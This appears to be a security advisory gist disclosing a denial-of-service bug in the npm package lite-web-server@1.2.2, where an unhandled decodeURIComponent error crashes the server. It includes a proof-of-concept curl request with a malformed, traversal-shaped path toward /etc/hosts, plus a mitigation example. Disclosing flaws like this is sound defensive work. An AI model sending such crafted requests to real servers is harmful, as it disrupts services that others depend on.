@lirantal
Created October 21, 2022 17:56
Denial of Service in lite-web-server@1.2.2

Denial of Service vulnerability in lite-web-server@1.2.2

lite-web-server is an HTTP file server, and describes itself as "The npm package to create simple web server."

Observation:

  • Virtually zero downloads, so no considerable impact.
  • It was last published 6 months ago, so we can assume some level of maintenance exists.

Resources:

Background on exploitation

If an attacker makes an HTTP request to a server running with lite-web-server and includes control characters that the decodeURI() function is unable to parse, then it causes lite-web-server to crash.

The vulnerable code is line 274 of src/WebServer.js which doesn't handle an exception thrown here:

          var _url = decodeURIComponent(req.url).slice(1);
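
The mitigation for this class of crash is to treat a decoding failure as a client error. The following is an added example, not code from lite-web-server or from the original gist: the names safeDecodePath and handleRequest are hypothetical, and the 200 branch stands in for the real file-serving logic.

```javascript
// Added example (not lite-web-server code): decode the request path without
// letting a malformed percent-escape take down the process.

// Returns the decoded path without its leading "/", or null when the URL
// contains a percent-escape that does not decode to valid UTF-8.
function safeDecodePath(rawUrl) {
  try {
    return decodeURIComponent(rawUrl).slice(1);
  } catch (err) {
    if (err instanceof URIError) return null; // malformed %-sequence
    throw err; // anything else is a real bug; do not swallow it
  }
}

// Hypothetical request handler: answers 400 instead of throwing.
function handleRequest(req, res) {
  const path = safeDecodePath(req.url);
  if (path === null) {
    res.writeHead(400, { "Content-Type": "text/plain" });
    res.end("Bad Request: malformed URL encoding\n");
    return;
  }
  // Placeholder for the file-serving logic of a real server.
  res.writeHead(200, { "Content-Type": "text/plain" });
  res.end(`decoded path: ${path}\n`);
}

// Constructed sample inputs; the first is the path used in this write-up.
function demo() {
  return ["/..%c0%2fetc%c0%2fhosts", "/index.html", "/a%20b.txt", "/%E0%A4%A"]
    .map((url) => [url, safeDecodePath(url)]);
}

// Start a real listener only when asked: node example.js --listen
if (typeof require === "function" && typeof module !== "undefined" &&
    require.main === module && process.argv.includes("--listen")) {
  require("node:http").createServer(handleRequest).listen(3000, "127.0.0.1");
} else {
  for (const [url, decoded] of demo()) console.log(url, "->", decoded);
}
```

Sending the malformed path to this handler returns a 400 response and the process keeps serving other clients.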

Proof of Concept exploit

  1. Install the package: npm install --save lite-web-server@1.2.2
  2. Create a server.js to serve requests (see below)
  3. Ensure you have a ./public directory in the current project and have a file in there
  4. Send an HTTP request which uses unicode characters outside of the ASCII scope of URLs: curl http://10.100.102.7:3000/..%c0%2fetc%c0%2fhosts
  5. Observe the server crashes

server.js

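// Minimal server used to reproduce the crash: serves files from ./public/
var { WebServer } = require("lite-web-server");
var server = new WebServer({
  dir: "./public/"
});

// Start listening for HTTP requests
server.start();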

Author

Liran Tal
